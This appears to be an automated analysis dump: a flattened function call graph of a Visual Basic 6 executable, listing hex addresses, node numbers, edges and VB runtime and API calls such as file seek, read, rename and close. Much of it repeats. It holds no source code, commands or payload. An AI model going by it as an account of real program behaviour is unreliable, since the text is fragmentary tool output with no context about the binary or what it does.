__vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5455->5457 5456->5454 5457->5452 5458 40d99c __vbaStrFixstr __vbaStrMove 5457->5458 5459 40ff70 14 API calls 5458->5459 5460 40d9c9 7 API calls 5459->5460 5461 40e1d1 __vbaErrorOverflow 5460->5461 5462 40da8b 7 API calls 5460->5462 5475 40e1e0 5461->5475 5463 40df09 6 API calls 5462->5463 5482 40daf3 5462->5482 5464 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5463->5464 5465 40e09e #598 __vbaRecUniToAnsi 5463->5465 5464->5465 5467 40e028 5464->5467 5465->5482 5466 40f8f0 4 API calls 5466->5482 5468 40e04a #580 __vbaStrToAnsi 5467->5468 5472 40e044 __vbaSetSystemError 5467->5472 5474 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 5467->5474 5468->5467 5469 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5469->5458 5471 40e107 5469->5471 5470 4123c0 47 API calls 5473 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5470->5473 5477 40e117 __vbaSetSystemError 5471->5477 5472->5468 5476 40ee70 24 API calls 5473->5476 5474->5465 5478 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5476->5478 5477->5452 5479 40dbbb __vbaStrCopy 5478->5479 5478->5482 5480 40ee70 24 API calls 5479->5480 5481 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5480->5481 5481->5482 5483 40dc2f __vbaStrCat __vbaStrMove 5481->5483 5482->5465 5482->5466 5482->5469 5482->5470 5485 4128b0 65 API calls 5482->5485 5488 411d10 1112 API calls 5482->5488 5484 40fba0 30 API calls 5483->5484 5486 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5484->5486 5485->5482 5487 415660 145 API calls 5486->5487 5489 40dc9b __vbaFreeStr 5487->5489 5488->5482 5489->5482 5490 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5489->5490 5491 40fba0 30 API calls 5490->5491 5492 40dd14 5491->5492 5493 40dd24 __vbaNew2 5492->5493 5494 40dd63 __vbaObjSet __vbaObjSet 5492->5494 5493->5492 5495 412c10 452 API calls 5494->5495 5496 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5495->5496 5497 415d30 404 API calls 5496->5497 5498 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5497->5498 5499 4111a0 122 API calls 5498->5499 5500 40de51 __vbaFreeStr 5499->5500 5500->5482 5501 40de6f #598 5500->5501 5502 40fba0 30 API calls 5501->5502 5503 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5502->5503 5503->5482 5504 408c50 5505 40ee70 24 API calls 5504->5505 5506 408c55 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5505->5506 5507 40ee70 24 API calls 5506->5507 5508 408c9e __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5507->5508 5509 40ee70 24 API calls 5508->5509 5510 408ce7 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5509->5510 5511 40ee70 24 API calls 5510->5511 5512 408d30 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5511->5512 5513 408d91 5512->5513 5514 408da2 18 API calls 5513->5514 5515 4091be __vbaStrCmp 5513->5515 5516 410180 65 API calls 5514->5516 5517 4091e0 5515->5517 5518 40948c __vbaStrCmp 5515->5518 5519 408e8c 19 API calls 5516->5519 5522 4125a0 60 API calls 5517->5522 5520 409b34 __vbaStrCopy 5518->5520 5521 4094ae 5518->5521 5523 410180 65 API calls 5519->5523 5525 40ee70 24 API calls 5520->5525 5524 4125a0 60 API calls 5521->5524 5526 409203 5522->5526 5527 408fa5 7 API calls 5523->5527 5528 4094c1 5524->5528 5529 409b52 __vbaStrMove __vbaStrCopy 5525->5529 5530 40924b __vbaStrCat #600 __vbaFreeVar 5526->5530 5536 40fba0 30 API calls 5526->5536 5533 410180 65 API calls 5527->5533 5534 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 5528->5534 5540 40fba0 30 API calls 5528->5540 5535 40ee70 24 API calls 5529->5535 5531 409298 5530->5531 5532 4092aa __vbaStrCopy 5530->5532 5544 4092a4 __vbaSetSystemError 5531->5544 5539 40ee70 24 API calls 5532->5539 5538 40902e 25 API calls 5533->5538 5542 409573 5534->5542 5541 409b74 13 API calls 5535->5541 5537 40921c 5536->5537 5543 415660 145 API calls 5537->5543 5545 410180 65 API calls 5538->5545 5546 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5539->5546 5547 4094da 5540->5547 5548 411590 145 API calls 5541->5548 5550 409584 __vbaHresultCheckObj 5542->5550 5551 4095a7 5542->5551 5552 409235 #580 5543->5552 5544->5532 5553 409177 __vbaFreeStrList 5545->5553 5558 409309 __vbaObjSet 5546->5558 5554 415660 145 API calls 5547->5554 5549 409c6c __vbaFreeStrList 5548->5549 5555 409c99 __vbaEnd 5549->5555 5556 409cab 5549->5556 5557 4095b1 __vbaFreeObj 5550->5557 5551->5557 5552->5530 5559 4094f3 #580 5554->5559 5560 409dec __vbaStrCopy 5555->5560 5561 4125a0 60 API calls 5556->5561 5564 4095d0 __vbaStrCopy 5557->5564 5565 40932e 5558->5565 5559->5534 5562 40ee70 24 API calls 5560->5562 5563 409cbe 5561->5563 5566 409e0a __vbaStrMove __vbaStrCopy 5562->5566 5563->5560 5567 409cca #535 5563->5567 5568 410fb0 18 API calls 5564->5568 5569 409362 5565->5569 5570 40933f __vbaHresultCheckObj 5565->5570 5572 40ee70 24 API calls 5566->5572 5573 40aba7 5567->5573 5574 409cea 8 API calls 5567->5574 5575 4095ee __vbaStrMove 5568->5575 5571 40936c 7 API calls 5569->5571 5570->5571 5576 410780 47 API calls 5571->5576 5577 409e2c 7 API calls 5572->5577 5573->5573 5578 410180 65 API calls 5574->5578 5579 40ee70 24 API calls 5575->5579 5580 4093d0 __vbaFreeStrList 5576->5580 5581 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5577->5581 5582 409d5a __vbaFreeStrList 5578->5582 5583 409603 __vbaStrMove __vbaInStr __vbaFreeStrList 5579->5583 5584 409405 8 API calls 5580->5584 5585 409487 5580->5585 5586 418c90 20 API calls 5581->5586 5587 40fba0 30 API calls 5582->5587 5588 4097e2 __vbaStrCopy 5583->5588 5589 40964c __vbaStrCopy 5583->5589 5584->5585 5585->5581 5591 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5586->5591 5592 409d86 #598 5587->5592 5590 410fb0 18 API calls 5588->5590 5593 40ee70 24 API calls 5589->5593 5594 409800 __vbaStrMove 5590->5594 5595 418c90 20 API calls 5591->5595 5596 415660 145 API calls 5592->5596 5597 40966a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5593->5597 5598 40ee70 24 API calls 5594->5598 5599 409fa2 __vbaFreeStrList 5595->5599 5600 409dac 5596->5600 5601 40ee70 24 API calls 5597->5601 5602 409815 __vbaStrMove __vbaInStr __vbaFreeStrList 5598->5602 5603 418a10 15 API calls 5599->5603 5604 409db3 5600->5604 5605 409db5 #535 __vbaFpR4 5600->5605 5606 4096b3 15 API calls 5601->5606 5607 409aad __vbaObjSet 5602->5607 5608 40985e 5602->5608 5609 409fd4 5603->5609 5610 409dd6 #580 5604->5610 5605->5574 5605->5610 5606->5607 5617 409ae8 5607->5617 5611 40986e __vbaNew2 5608->5611 5614 40988a 5608->5614 5612 418a10 15 API calls 5609->5612 5610->5560 5611->5614 5615 409ff2 __vbaStrCopy 5612->5615 5622 4098c9 __vbaHresultCheckObj 5614->5622 5623 4098ec 5614->5623 5616 40ee70 24 API calls 5615->5616 5618 40a010 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5616->5618 5620 409af9 __vbaHresultCheckObj 5617->5620 5621 409b1c 5617->5621 5619 40ee70 24 API calls 5618->5619 5624 40a059 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5619->5624 5625 409b26 __vbaFreeObj 5620->5625 5621->5625 5622->5623 5629 409926 __vbaHresultCheckObj 5623->5629 5630 409949 5623->5630 5626 40ee70 24 API calls 5624->5626 5625->5581 5627 40a0a2 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5626->5627 5628 40ee70 24 API calls 5627->5628 5632 40a0eb __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5628->5632 5631 409953 20 API calls 5629->5631 5630->5631 5631->5607 5633 40ee70 24 API calls 5632->5633 5634 40a13b 6 API calls 5633->5634 5635 40ee70 24 API calls 5634->5635 5636 40a1a1 6 API calls 5635->5636 5637 40ee70 24 API calls 5636->5637 5638 40a200 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5637->5638 5639 40a261 5638->5639 5640 40a272 __vbaStrCat __vbaStrMove 5639->5640 5641 40aa5b 5639->5641 5642 40f8f0 4 API calls 5640->5642 5643 40f1d0 120 API calls 5641->5643 5644 40a2a0 __vbaFreeStr 5642->5644 5645 40aa6c 5643->5645 5646 40a329 __vbaStrCat __vbaStrMove 5644->5646 5647 40a2bb 7 API calls 5644->5647 5648 40aa7f __vbaObjSet 5645->5648 5696 40f1a0 __vbaStrCopy __vbaStrCopy 5645->5696 5649 40f8f0 4 API calls 5646->5649 5647->5646 5655 40aaba 5648->5655 5652 40a357 __vbaFreeStr 5649->5652 5653 40a3e0 __vbaStrCat __vbaStrMove 5652->5653 5654 40a372 7 API calls 5652->5654 5656 40f8f0 4 API calls 5653->5656 5654->5653 5657 40aacb __vbaHresultCheckObj 5655->5657 5658 40aaee 5655->5658 5659 40a40e __vbaFreeStr 5656->5659 5660 40aaf8 __vbaFreeObj 5657->5660 5658->5660 5661 40a497 __vbaStrCat __vbaStrMove 5659->5661 5662 40a429 7 API calls 5659->5662 5664 40ab6f __vbaFreeStr __vbaFreeStr 5660->5664 5663 40f8f0 4 API calls 5661->5663 5662->5661 5665 40a4c5 __vbaFreeStr 5663->5665 5666 40a4e0 7 API calls 5665->5666 5667 40a54e __vbaStrCat __vbaStrMove 5665->5667 5666->5667 5668 40f8f0 4 API calls 5667->5668 5669 40a57c __vbaFreeStr 5668->5669 5670 40a605 __vbaStrCat __vbaStrMove 5669->5670 5671 40a597 7 API calls 5669->5671 5672 40f8f0 4 API calls 5670->5672 5671->5670 5673 40a633 __vbaFreeStr 5672->5673 5674 40a6bc __vbaStrCat __vbaStrMove 5673->5674 5675 40a64e 7 API calls 5673->5675 5676 40f8f0 4 API calls 5674->5676 5675->5674 5677 40a6ea __vbaFreeStr 5676->5677 5678 40a773 __vbaStrCat __vbaStrMove 5677->5678 5679 40a705 7 API calls 5677->5679 5680 40f8f0 4 API calls 5678->5680 5679->5678 5681 40a7a1 __vbaFreeStr 5680->5681 5682 40a82a __vbaStrCat __vbaStrMove 5681->5682 5683 40a7bc 7 API calls 5681->5683 5684 40f8f0 4 API calls 5682->5684 5683->5682 5685 40a858 __vbaFreeStr 5684->5685 5686 40a8e1 __vbaStrCat __vbaStrMove 5685->5686 5687 40a873 7 API calls 5685->5687 5688 40f8f0 4 API calls 5686->5688 5687->5686 5689 40a90f __vbaFreeStr 5688->5689 5690 40a998 __vbaStrCat __vbaStrMove 5689->5690 5691 40a92a 7 API calls 5689->5691 5692 40f8f0 4 API calls 5690->5692 5691->5690 5693 40a9c6 __vbaFreeStr 5692->5693 5694 40a9e1 7 API calls 5693->5694 5695 40aa4f 5693->5695 5694->5695 5696->5648 5697 40e250 5698 40e28a __vbaOnError 5697->5698 5699 40e2a8 5698->5699 5700 40e2c0 5699->5700 5701 40e2ae __vbaHresultCheckObj 5699->5701 5702 40e2d8 __vbaHresultCheckObj 5700->5702 5703 40e2ea __vbaFreeObj __vbaExitProc 5700->5703 5701->5700 5702->5703 5704 40e310 5703->5704 6013 40d4d4 6014 40d741 __vbaErrorOverflow 6013->6014 6017 40d4e5 6013->6017 6015 40d750 __vbaChkstk 6014->6015 6018 40d7a5 __vbaOnError 6015->6018 6016 40d6db 6016->6014 6017->6016 6023 40d567 6017->6023 6024 40d547 __vbaHresultCheckObj 6017->6024 6019 40f9a0 4 API calls 6018->6019 6020 40d7cb 6019->6020 6021 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 6020->6021 6022 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 6020->6022 6025 40d841 __vbaStrCat __vbaStrMove 6021->6025 6026 40d82a __vbaStrCopy 6021->6026 6027 40d571 __vbaChkstk 6023->6027 6024->6027 6029 40d864 __vbaInStr __vbaInStr 6025->6029 6026->6029 6032 40d5b9 6027->6032 6030 40e11d #598 6029->6030 6031 40d8ad 6029->6031 6030->6022 6033 40d8cf 6 API calls 6031->6033 6037 40d8c9 __vbaSetSystemError 6031->6037 6034 40d5ea __vbaObjSet 6032->6034 6035 40d5ca __vbaHresultCheckObj 6032->6035 6036 404c70 6033->6036 6042 40d646 6034->6042 6035->6034 6038 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 6036->6038 6037->6033 6038->6030 6039 40d99c __vbaStrFixstr __vbaStrMove 6038->6039 6041 40ff70 14 API calls 6039->6041 6043 40d9c9 7 API calls 6041->6043 6044 40d651 __vbaHresultCheckObj 6042->6044 6045 40d66e 6042->6045 6046 40e1d1 __vbaErrorOverflow 6043->6046 6047 40da8b 7 API calls 6043->6047 6048 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 6044->6048 6045->6048 6061 40e1e0 6046->6061 6049 40df09 6 API calls 6047->6049 6072 40daf3 6047->6072 6048->6014 6050 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 6049->6050 6051 40e09e #598 __vbaRecUniToAnsi 6049->6051 6050->6051 6053 40e028 6050->6053 6051->6072 6052 40f8f0 4 API calls 6052->6072 6054 40e04a #580 __vbaStrToAnsi 6053->6054 6058 40e044 __vbaSetSystemError 6053->6058 6060 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 6053->6060 6054->6053 6055 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 6055->6039 6057 40e107 6055->6057 6056 4123c0 47 API calls 6059 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 6056->6059 6063 40e117 __vbaSetSystemError 6057->6063 6058->6054 6062 40ee70 24 API calls 6059->6062 6060->6051 6064 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6062->6064 6063->6030 6065 40dbbb __vbaStrCopy 6064->6065 6064->6072 6066 40ee70 24 API calls 6065->6066 6067 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6066->6067 6068 40dc2f __vbaStrCat __vbaStrMove 6067->6068 6067->6072 6069 40fba0 30 API calls 6068->6069 6071 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 6069->6071 6070 4128b0 65 API calls 6070->6072 6073 415660 145 API calls 6071->6073 6072->6051 6072->6052 6072->6055 6072->6056 6072->6070 6074 411d10 1112 API calls 6072->6074 6075 40dc9b __vbaFreeStr 6073->6075 6074->6072 6075->6072 6076 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 6075->6076 6077 40fba0 30 API calls 6076->6077 6078 40dd14 6077->6078 6079 40dd24 __vbaNew2 6078->6079 6080 40dd63 __vbaObjSet __vbaObjSet 6078->6080 6079->6078 6081 412c10 452 API calls 6080->6081 6082 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 6081->6082 6083 415d30 404 API calls 6082->6083 6084 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 6083->6084 6085 4111a0 122 API calls 6084->6085 6086 40de51 __vbaFreeStr 6085->6086 6086->6072 6087 40de6f #598 6086->6087 6088 40fba0 30 API calls 6087->6088 6089 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 6088->6089 6089->6072 5705 418954 5706 418957 __vbaExitProc 5705->5706 5707 40fb57 5708 40fb61 __vbaFreeStr 5707->5708 5709 40fb6a __vbaFreeVar 5707->5709 5708->5709 5710 417458 __vbaExitProc 5711 417470 6 API calls 5710->5711 5715 40e666 __vbaFreeStr 6093 4160e6 __vbaAryUnlock __vbaFreeStr 5716 40256a 5717 402576 5716->5717 5718 4024f7 5717->5718 5719 4025ca __vbaExceptHandler 5717->5719 5721 40e570 __vbaChkstk 5722 40e5c5 8 API calls 5721->5722 5723 40e670 __vbaFreeObj 5722->5723 5724 40cd70 __vbaOnError 5725 40cdcd __vbaObjSet 5724->5725 5726 40cde4 5725->5726 5727 40cdf9 5726->5727 5728 40cdea __vbaHresultCheckObj 5726->5728 5729 40cf61 __vbaErrorOverflow 5727->5729 5730 40ce07 __vbaFreeObj 5727->5730 5728->5727 5731 40cf70 __vbaChkstk 5729->5731 5737 40ce29 5730->5737 5734 40cfc5 __vbaOnError 5731->5734 5732 40cf0c __vbaExitProc 5733 40cf41 5732->5733 5736 40d001 __vbaObjSet 5734->5736 5735 40ce3f __vbaObjSet 5735->5737 5738 40d01f 5736->5738 5737->5729 5737->5732 5737->5735 5739 40ce60 __vbaHresultCheckObj 5737->5739 5740 40ce6f 6 API calls 5737->5740 5741 40d047 5738->5741 5742 40d02a __vbaHresultCheckObj 5738->5742 5739->5740 5740->5737 5743 40cef8 __vbaExitProc 5740->5743 5744 40d741 __vbaErrorOverflow 5741->5744 5745 40d05f __vbaFreeObj 5741->5745 5742->5741 5743->5733 5746 40d750 __vbaChkstk 5744->5746 5758 40d080 5745->5758 5748 40d7a5 __vbaOnError 5746->5748 5747 40d144 __vbaCastObj __vbaObjSet 5750 40d173 5747->5750 5749 40f9a0 4 API calls 5748->5749 5752 40d7cb 5749->5752 5753 40d19e 5750->5753 5754 40d17e __vbaHresultCheckObj 5750->5754 5751 40d0bc __vbaObjSet 5751->5758 5755 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5752->5755 5756 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5752->5756 5757 40d1a8 __vbaFreeObj 5753->5757 5754->5757 5759 40d841 __vbaStrCat __vbaStrMove 5755->5759 5760 40d82a __vbaStrCopy 5755->5760 5765 40d1c7 __vbaObjSet 5757->5765 5758->5744 5758->5747 5758->5751 5762 40d0ea __vbaHresultCheckObj 5758->5762 5763 40d111 __vbaLateIdCall __vbaFreeObjList 5758->5763 5764 40d864 __vbaInStr __vbaInStr 5759->5764 5760->5764 5762->5763 5763->5758 5766 40e11d #598 5764->5766 5767 40d8ad 5764->5767 5769 40d1e5 5765->5769 5766->5756 5768 40d8cf 6 API calls 5767->5768 5773 40d8c9 __vbaSetSystemError 5767->5773 5772 404c70 5768->5772 5770 40d1f0 __vbaHresultCheckObj 5769->5770 5771 40d20d 5769->5771 5770->5771 5771->5744 5775 40d225 __vbaFreeObj 5771->5775 5774 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5772->5774 5773->5768 5774->5766 5776 40d99c __vbaStrFixstr __vbaStrMove 5774->5776 5777 40d25b 5775->5777 5778 40ff70 14 API calls 5776->5778 5780 40d390 __vbaNew __vbaObjSet 5777->5780 5781 40d26c 5777->5781 5779 40d9c9 7 API calls 5778->5779 5782 40e1d1 __vbaErrorOverflow 5779->5782 5783 40da8b 7 API calls 5779->5783 5787 40d3bd 5780->5787 5784 40d298 __vbaObjSet 5781->5784 5785 40d27c __vbaNew2 5781->5785 5793 40e1e0 5782->5793 5786 40df09 6 API calls 5783->5786 5824 40daf3 5783->5824 5802 40d2df 5784->5802 5785->5784 5788 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5786->5788 5789 40e09e #598 __vbaRecUniToAnsi 5786->5789 5791 40d3e8 5787->5791 5792 40d3c8 __vbaHresultCheckObj 5787->5792 5788->5789 5794 40e028 5788->5794 5789->5824 5790 40f8f0 4 API calls 5790->5824 5795 40d3f2 __vbaFreeObj 5791->5795 5792->5795 5797 40e04a #580 __vbaStrToAnsi 5794->5797 5803 40e044 __vbaSetSystemError 5794->5803 5805 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 5794->5805 5800 40d415 5795->5800 5797->5794 5798 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5798->5776 5801 40e107 5798->5801 5799 4123c0 47 API calls 5804 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5799->5804 5806 40d440 5800->5806 5807 40d420 __vbaHresultCheckObj 5800->5807 5811 40e117 __vbaSetSystemError 5801->5811 5808 40d307 5802->5808 5809 40d2ea __vbaHresultCheckObj 5802->5809 5803->5797 5810 40ee70 24 API calls 5804->5810 5805->5789 5819 40d488 5806->5819 5820 40d46b __vbaHresultCheckObj 5806->5820 5807->5806 5812 40d311 __vbaObjSet 5808->5812 5809->5812 5813 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5810->5813 5811->5766 5815 40d33f 5812->5815 5814 40dbbb __vbaStrCopy 5813->5814 5813->5824 5816 40ee70 24 API calls 5814->5816 5817 40d367 5815->5817 5818 40d34a __vbaHresultCheckObj 5815->5818 5822 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5816->5822 5821 40d371 __vbaFreeObjList 5817->5821 5818->5821 5819->5744 5823 40d49e __vbaI2I4 __vbaFreeObj 5819->5823 5820->5819 5822->5824 5825 40dc2f __vbaStrCat __vbaStrMove 5822->5825 5834 40d4e9 5823->5834 5824->5789 5824->5790 5824->5798 5824->5799 5827 4128b0 65 API calls 5824->5827 5831 411d10 1112 API calls 5824->5831 5826 40fba0 30 API calls 5825->5826 5828 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5826->5828 5827->5824 5830 415660 145 API calls 5828->5830 5829 40d6db 5829->5744 5832 40dc9b __vbaFreeStr 5830->5832 5831->5824 5832->5824 5833 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5832->5833 5835 40fba0 30 API calls 5833->5835 5834->5829 5836 40d567 5834->5836 5837 40d547 __vbaHresultCheckObj 5834->5837 5838 40dd14 5835->5838 5839 40d571 __vbaChkstk 5836->5839 5837->5839 5840 40dd24 __vbaNew2 5838->5840 5844 40dd63 __vbaObjSet __vbaObjSet 5838->5844 5841 40d5b9 5839->5841 5840->5838 5842 40d5ea __vbaObjSet 5841->5842 5843 40d5ca __vbaHresultCheckObj 5841->5843 5849 40d646 5842->5849 5843->5842 5845 412c10 452 API calls 5844->5845 5846 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5845->5846 5848 415d30 404 API calls 5846->5848 5850 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5848->5850 5851 40d651 __vbaHresultCheckObj 5849->5851 5852 40d66e 5849->5852 5853 4111a0 122 API calls 5850->5853 5855 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5851->5855 5852->5855 5854 40de51 __vbaFreeStr 5853->5854 5854->5824 5856 40de6f #598 5854->5856 5855->5744 5857 40fba0 30 API calls 5856->5857 5858 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5857->5858 5858->5824 5859 419674 __vbaFileClose __vbaFileClose 5860 41968d __vbaExitProc 5859->5860 5861 4196c2 __vbaFreeStr __vbaFreeStr __vbaFreeStr 5860->5861 6096 40edfa 6097 40ee00 __vbaFreeStr 6096->6097 6098 40ee09 __vbaFreeStrList __vbaFreeVarList 6096->6098 6097->6098 4353 408d7c 4354 40abac __vbaErrorOverflow 4353->4354 4355 408d8d 4353->4355 4356 40abc0 __vbaChkstk 4354->4356 4357 408da2 18 API calls 4355->4357 4358 4091be __vbaStrCmp 4355->4358 4360 40ac15 __vbaOnError 4356->4360 4544 410180 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4357->4544 4361 4091e0 4358->4361 4362 40948c __vbaStrCmp 4358->4362 4364 418c90 20 API calls 4360->4364 4367 4125a0 60 API calls 4361->4367 4365 409b34 __vbaStrCopy 4362->4365 4366 4094ae 4362->4366 4363 408e8c 19 API calls 4368 410180 65 API calls 4363->4368 4369 40ac50 4364->4369 4371 40ee70 24 API calls 4365->4371 4370 4125a0 60 API calls 4366->4370 4377 409203 4367->4377 4372 408fa5 7 API calls 4368->4372 4373 418c90 20 API calls 4369->4373 4374 4094c1 4370->4374 4375 409b52 __vbaStrMove __vbaStrCopy 4371->4375 4380 410180 65 API calls 4372->4380 4381 40ac75 4373->4381 4382 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 4374->4382 4388 40fba0 30 API calls 4374->4388 4383 40ee70 24 API calls 4375->4383 4376 40924b __vbaStrCat #600 __vbaFreeVar 4378 409298 4376->4378 4379 4092aa __vbaStrCopy 4376->4379 4377->4376 4384 40fba0 30 API calls 4377->4384 4392 4092a4 __vbaSetSystemError 4378->4392 4387 40ee70 24 API calls 4379->4387 4386 40902e 25 API calls 4380->4386 4390 409573 4382->4390 4389 409b74 13 API calls 4383->4389 4385 40921c 4384->4385 4391 415660 145 API calls 4385->4391 4393 410180 65 API calls 4386->4393 4394 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4387->4394 4395 4094da 4388->4395 4564 411590 12 API calls 4389->4564 4398 409584 __vbaHresultCheckObj 4390->4398 4399 4095a7 4390->4399 4400 409235 #580 4391->4400 4392->4379 4401 409177 __vbaFreeStrList 4393->4401 4406 409309 __vbaObjSet 4394->4406 4402 415660 145 API calls 4395->4402 4397 409c6c __vbaFreeStrList 4403 409c99 __vbaEnd 4397->4403 4404 409cab 4397->4404 4405 4095b1 __vbaFreeObj 4398->4405 4399->4405 4400->4376 4407 4094f3 #580 4402->4407 4408 409dec __vbaStrCopy 4403->4408 4409 4125a0 60 API calls 4404->4409 4412 4095d0 __vbaStrCopy 4405->4412 4413 40932e 4406->4413 4407->4382 4410 40ee70 24 API calls 4408->4410 4411 409cbe 4409->4411 4414 409e0a __vbaStrMove __vbaStrCopy 4410->4414 4411->4408 4415 409cca #535 4411->4415 4611 410fb0 __vbaRecUniToAnsi 4412->4611 4417 409362 4413->4417 4418 40933f __vbaHresultCheckObj 4413->4418 4420 40ee70 24 API calls 4414->4420 4421 40aba7 4415->4421 4422 409cea 8 API calls 4415->4422 4419 40936c 7 API calls 4417->4419 4418->4419 4593 410780 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4419->4593 4425 409e2c 7 API calls 4420->4425 4421->4421 4426 410180 65 API calls 4422->4426 4429 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4425->4429 4430 409d5a __vbaFreeStrList 4426->4430 4434 418c90 20 API calls 4429->4434 4435 40fba0 30 API calls 4430->4435 4439 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4434->4439 4440 409d86 #598 4435->4440 4443 418c90 20 API calls 4439->4443 4444 415660 145 API calls 4440->4444 4447 409fa2 __vbaFreeStrList 4443->4447 4448 409dac 4444->4448 4615 418a10 __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 4447->4615 4452 409db3 4448->4452 4453 409db5 #535 __vbaFpR4 4448->4453 4458 409dd6 #580 4452->4458 4453->4422 4453->4458 4458->4408 4660 404d50 4544->4660 4546 410204 __vbaSetSystemError __vbaRecUniToAnsi 4547 404dc4 4546->4547 4548 410254 __vbaSetSystemError __vbaRecAnsiToUni #525 __vbaStrMove 4547->4548 4553 4102ad 4548->4553 4549 4104dd 4550 4104ed FindCloseChangeNotification 4549->4550 4552 410514 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 4550->4552 4551 4102d8 __vbaSetSystemError 4551->4553 4554 41031d __vbaGenerateBoundsError 4551->4554 4552->4363 4553->4549 4553->4551 4555 410329 __vbaStrToAnsi 4553->4555 4556 410358 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr #616 __vbaStrMove 4553->4556 4563 4104aa __vbaSetSystemError __vbaRecAnsiToUni 4553->4563 4554->4555 4555->4553 4557 410b60 12 API calls 4556->4557 4558 4103b9 __vbaStrMove __vbaFreeStr __vbaLenBstr 4557->4558 4559 410480 __vbaRecUniToAnsi 4558->4559 4560 4103e9 6 API calls 4558->4560 4559->4553 4560->4559 4561 41046d 4560->4561 4562 410080 18 API calls 4561->4562 4562->4559 4563->4553 4565 411684 4564->4565 4566 411cff __vbaErrorOverflow 4564->4566 4565->4566 4567 4116a1 8 API calls 4565->4567 4568 41179f __vbaI2I4 __vbaFileClose 4565->4568 4569 40ee70 24 API calls 4567->4569 4570 411c91 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4568->4570 4571 41171b __vbaStrMove 4569->4571 4570->4397 4573 40ee70 24 API calls 4571->4573 4574 411730 __vbaStrMove __vbaStrCmp __vbaFreeStrList 4573->4574 4575 411781 __vbaI2I4 __vbaFileClose 4574->4575 4576 411772 4574->4576 4575->4570 4576->4566 4577 4117ce __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 4576->4577 4577->4566 4578 41181c 4577->4578 4578->4566 4579 411825 __vbaI2I4 __vbaFileSeek 4578->4579 4580 40fba0 30 API calls 4579->4580 4581 411851 6 API calls 4580->4581 4585 4118d9 4581->4585 4582 4119d6 __vbaI2I4 __vbaFileClose 4583 40fba0 30 API calls 4582->4583 4586 4119fd 11 API calls 4583->4586 4584 411907 __vbaI2I4 __vbaGet3 